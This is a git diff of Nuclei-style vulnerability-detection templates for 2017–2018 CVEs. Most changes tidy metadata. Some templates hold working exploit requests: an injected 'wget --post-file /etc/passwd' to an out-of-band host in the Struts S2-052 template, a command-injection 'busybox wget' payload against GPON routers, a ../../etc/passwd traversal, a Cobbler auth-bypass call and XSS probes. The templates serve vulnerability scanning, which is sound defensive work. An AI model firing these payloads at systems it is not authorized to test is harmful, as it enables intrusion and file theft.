http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - https://www.exploit-db.com/exploits/41890 + - http://www.openwall.com/lists/oss-security/2017/04/16/2 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-7615 cwe-id: CWE-640 + tags: cve,cve2017,mantisbt requests: - method: GET diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml index 5a1fbdfe03..cd9e3b9bde 100644 --- a/cves/2017/CVE-2017-7921.yaml +++ b/cves/2017/CVE-2017-7921.yaml @@ -1,18 +1,20 @@ id: CVE-2017-7921 + info: - name: Hikvision Authentication Bypass + name: Hikvision - Authentication Bypass author: princechaddha severity: critical - description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. + description: Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. reference: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 - tags: cve,cve2017,auth-bypass + - https://nvd.nist.gov/vuln/detail/CVE-2017-7921 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2017-7921 cwe-id: CWE-287 + tags: cve,cve2017,auth-bypass,hikvision requests: - method: GET @@ -30,3 +32,5 @@ requests: words: - "application/xml" part: header + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml index a4968604e8..bbbf1e7547 100644 --- a/cves/2017/CVE-2017-8917.yaml +++ b/cves/2017/CVE-2017-8917.yaml @@ -1,16 +1,22 @@ id: CVE-2017-8917 + info: - name: Joomla SQL Injection + name: Joomla! <3.7.1 - SQL Injection author: princechaddha severity: critical - description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. - reference: https://www.cvedetails.com/cve/CVE-2017-8917/ - tags: cve,cve2017,joomla,sqli + description: | + Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors. + reference: + - https://www.cvedetails.com/cve/CVE-2017-8917/ + - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html + - http://www.securityfocus.com/bid/98515 + - http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 + tags: cve,cve2017,joomla,sqli requests: - method: GET @@ -19,6 +25,8 @@ requests: matchers: - type: word + part: body words: - "cf79ae6addba60ad018347359bd144d2" - part: body + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml index 365d6c0957..df598c2967 100644 --- a/cves/2017/CVE-2017-9140.yaml +++ b/cves/2017/CVE-2017-9140.yaml @@ -4,14 +4,19 @@ info: name: Reflected XSS - Telerik Reporting Module author: dhiyaneshDk severity: medium - tags: cve,cve2017,xss,telerik - description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. - reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module + description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. + reference: + - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module + - https://nvd.nist.gov/vuln/detail/CVE-2017-9140 + - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module + - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406) + remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-9140 cwe-id: CWE-79 + tags: cve,cve2017,xss,telerik requests: - method: GET @@ -29,3 +34,5 @@ requests: - '#000000"onload="prompt(1)' - 'Telerik.ReportViewer.axd?name=Resources' condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index 843b3c84d2..bc6706fc06 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 - tags: cve,cve2017,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + - https://github.com/MindscapeHQ/raygun4wordpress/pull/17 + - https://github.com/MindscapeHQ/raygun4wordpress/issues/16 + - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-9288 cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index a76d387e75..393153702a 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -9,12 +9,12 @@ info: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - tags: cve,cve2017,atlassian,jira,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-9506 cwe-id: CWE-918 + tags: cve,cve2017,atlassian,jira,ssrf,oast requests: - raw: @@ -25,6 +25,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml index a7acef344d..661dc3e197 100644 --- a/cves/2017/CVE-2017-9791.yaml +++ b/cves/2017/CVE-2017-9791.yaml @@ -1,19 +1,20 @@ id: CVE-2017-9791 info: - name: Apache Struts2 S2-053 RCE + name: Apache Struts2 S2-053 - Remote Code Execution author: pikpikcu severity: critical - description: The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage. + description: Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html - tags: cve,cve2017,apache,rce + - http://www.securitytracker.com/id/1038838 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-9791 cwe-id: CWE-20 + tags: cve,cve2017,apache,rce,struts requests: - method: POST @@ -27,15 +28,18 @@ requests: matchers-condition: and matchers: - type: word + part: header words: - "Content-Type: text/html" - part: header - type: regex + part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status status: - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 3fbcb5b5e2..fafd5baa0e 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -1,19 +1,20 @@ id: CVE-2017-9805 info: - name: Apache Struts2 S2-052 RCE + name: Apache Struts2 S2-052 - Remote Code Execution author: pikpikcu severity: high - description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. + description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - tags: cve,cve2017,apache,rce,struts + - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 + tags: cve,cve2017,apache,rce,struts requests: - method: POST @@ -42,7 +43,7 @@ requests: wget --post-file /etc/passwd - burpcollaborator.net + {{interactsh-url}} false @@ -93,3 +94,5 @@ requests: - type: status status: - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index 10a07fec84..e0057d0671 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -1,17 +1,21 @@ id: CVE-2017-9822 info: - name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) + name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution author: milo2012 severity: high - description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) - tags: cve,cve2017,dotnetnuke,bypass - reference: https://github.com/murataydemir/CVE-2017-9822 + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution. + reference: + - https://github.com/murataydemir/CVE-2017-9822 + - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 + - http://www.dnnsoftware.com/community/security/security-center + - http://www.securityfocus.com/bid/102213 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 + tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization requests: - raw: @@ -33,4 +37,6 @@ requests: - type: status status: - - 404 \ No newline at end of file + - 404 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-9833.yaml b/cves/2017/CVE-2017-9833.yaml new file mode 100644 index 0000000000..2f8c595a7e --- /dev/null +++ b/cves/2017/CVE-2017-9833.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-9833 + +info: + name: BOA Web Server 0.94.14 - Arbitrary File Access + author: 0x_Akoko + severity: high + description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. + reference: + - https://www.exploit-db.com/exploits/42290 + - https://www.cvedetails.com/cve/CVE-2017-9833 + - https://pastebin.com/raw/rt7LJvyF + - https://www.exploit-db.com/exploits/42290/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-9833 + cwe-id: CWE-22 + tags: boa,lfr,lfi,cve,cve2017 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index bb1e917308..7dfe3202f6 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -1,21 +1,22 @@ id: CVE-2017-9841 info: - name: CVE-2017-9841 + name: PHPUnit - Remote Code Execution author: Random_Robbie,pikpikcu severity: critical - description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "?mimeType=text/html" - - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + + stop-at-first-match: true matchers-condition: and matchers: + + - type: word + part: body + words: + - "" + - "java.lang.IllegalArgumentException" + - "No type with name" + condition: and + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "" - part: body - - type: word - words: - - "text/html" - part: header \ No newline at end of file diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index 9421966f6e..8fe310b37c 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -5,15 +5,15 @@ info: author: milo2012 severity: high description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server. - tags: cve,cve2018,jolokia,rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 - cve-id: CVE-2018-1000130 - cwe-id: CWE-74 reference: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2018-1000130 + cwe-id: CWE-74 + tags: cve,cve2018,jolokia,rce,jndi,proxy requests: - raw: diff --git a/cves/2018/CVE-2018-1000226.yaml b/cves/2018/CVE-2018-1000226.yaml new file mode 100644 index 0000000000..7e142d5b63 --- /dev/null +++ b/cves/2018/CVE-2018-1000226.yaml @@ -0,0 +1,63 @@ +id: CVE-2018-1000226 + +info: + name: Cobbler - Authentication Bypass + author: c-sh0 + severity: critical + description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. + reference: + - https://github.com/cobbler/cobbler/issues/1916 + - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-1000226 + cwe-id: CWE-732 + tags: cve,cve2018,cobbler,auth-bypass + +requests: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + _CobblerXMLRPCInterface__make_token + + + + cobbler + + + + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "Content-Type: text/xml" + + - type: word + part: body + words: + - "" + + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" + + - type: regex + part: body + regex: + - "(.*[a-zA-Z0-9].+==)" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml index 7532d878ce..75553411a0 100644 --- a/cves/2018/CVE-2018-1000533.yaml +++ b/cves/2018/CVE-2018-1000533.yaml @@ -1,17 +1,21 @@ id: CVE-2018-1000533 info: - name: GitList < 0.6.0 RCE + name: GitList < 0.6.0 Remote Code Execution author: pikpikcu severity: critical - description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user. - reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 - tags: rce,git,cve,cve2018,gitlist + description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution. + reference: + - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533 + - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html + - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1000533 cwe-id: CWE-20 + tags: rce,git,cve,cve2018,gitlist requests: - raw: @@ -40,3 +44,5 @@ requests: words: - "root:/root:/bin/bash" part: body + +# Enhanced by mp on 2022/04/08 diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml index e87764fc8b..91d7513c33 100644 --- a/cves/2018/CVE-2018-1000600.yaml +++ b/cves/2018/CVE-2018-1000600.yaml @@ -2,18 +2,19 @@ id: CVE-2018-1000600 info: name: Pre-auth Fully-responded SSRF + author: geeknik + severity: high description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. reference: - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ - author: geeknik - severity: high - tags: cve,cve2018,jenkins,ssrf,oast + - https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2018-1000600 cwe-id: CWE-200 + tags: cve,cve2018,jenkins,ssrf,oast requests: - method: GET diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml index 5dbeddcdaa..d82498789c 100644 --- a/cves/2018/CVE-2018-1000861.yaml +++ b/cves/2018/CVE-2018-1000861.yaml @@ -1,17 +1,21 @@ id: CVE-2018-1000861 info: - name: Jenkins 2.138 Remote Command Execution + name: Jenkins - Remote Command Injection author: dhiyaneshDK,pikpikcu severity: critical - reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - tags: cve,cve2018,jenkin,rce + description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + reference: + - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 + - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595 + - http://www.securityfocus.com/bid/106176 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way." + tags: cve,cve2018,jenkin,rce,jenkins requests: - method: GET @@ -29,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml index 6c881cf9d6..2af93144ba 100644 --- a/cves/2018/CVE-2018-10093.yaml +++ b/cves/2018/CVE-2018-10093.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/46164 - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 - tags: cve,cve2018,rce,iot + - https://www.exploit-db.com/exploits/46164/ + - http://seclists.org/fulldisclosure/2019/Jan/38 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2018-10093 cwe-id: CWE-862 + tags: cve,cve2018,rce,iot requests: - method: GET diff --git a/cves/2018/CVE-2018-10095.yaml b/cves/2018/CVE-2018-10095.yaml index 7c1ad45220..d66f487a38 100644 --- a/cves/2018/CVE-2018-10095.yaml +++ b/cves/2018/CVE-2018-10095.yaml @@ -6,13 +6,17 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095 - tags: cve,cve2018,xss,dolibarr + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-10095 + - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/ + - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56 + - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-10095 cwe-id: CWE-79 + tags: cve,cve2018,xss,dolibarr requests: - method: GET diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index 577e38e5cb..708fcc51fb 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml @@ -2,13 +2,15 @@ id: CVE-2018-10141 info: name: GlobalProtect Login page XSS - severity: medium author: dhiyaneshDk + severity: medium description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-10141 + - https://security.paloaltonetworks.com/CVE-2018-10141 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-10141 cwe-id: CWE-79 tags: cve,cve2018,panos,vpn,globalprotect,xss @@ -32,4 +34,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2018/CVE-2018-10201.yaml b/cves/2018/CVE-2018-10201.yaml index eb1ae10d80..f5b143ea99 100644 --- a/cves/2018/CVE-2018-10201.yaml +++ b/cves/2018/CVE-2018-10201.yaml @@ -1,13 +1,15 @@ id: CVE-2018-10201 info: - name: Ncomputing vSPace Pro 10 and 11 Directory Traversal + name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal author: 0x_akoko severity: high description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html - https://www.cvedetails.com/cve/CVE-2018-10201 + - http://www.kwell.net/kwell_blog/?p=5199 + - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -32,3 +34,5 @@ requests: - "fonts" - "extensions" condition: and + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml new file mode 100644 index 0000000000..d50142694d --- /dev/null +++ b/cves/2018/CVE-2018-10562.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-10562 + +info: + name: Dasan GPON Devices - Remote Code Execution + author: gy741 + severity: critical + description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. + reference: + - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router + - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py + - https://nvd.nist.gov/vuln/detail/CVE-2018-10562 + - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-10562 + cwe-id: CWE-78 + tags: cve,cve2018,dasan,gpon,rce,oast + +requests: + - raw: + - | + POST /GponForm/diag_Form?images/ HTTP/1.1 + Host: {{Hostname}} + + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0 + + - | + POST /GponForm/diag_Form?images/ HTTP/1.1 + Host: {{Hostname}} + + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0 + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index f4982c8731..af6bee0a00 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -1,14 +1,17 @@ id: CVE-2018-10818 info: - name: LG NAS Devices - Remote Code Execution (Unauthenticated) + name: LG NAS Devices - Remote Code Execution author: gy741 severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - tags: cve,cve2018,lg-nas,rce,oast + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818 + classification: + cve-id: CVE-2018-10818 + tags: cve,cve2018,lg-nas,rce,oast,injection requests: - raw: @@ -36,3 +39,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index d93affb5d4..072879bf42 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml @@ -4,16 +4,18 @@ info: name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request. reference: - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - tags: cve,cve2018,lfi,router,dlink + - 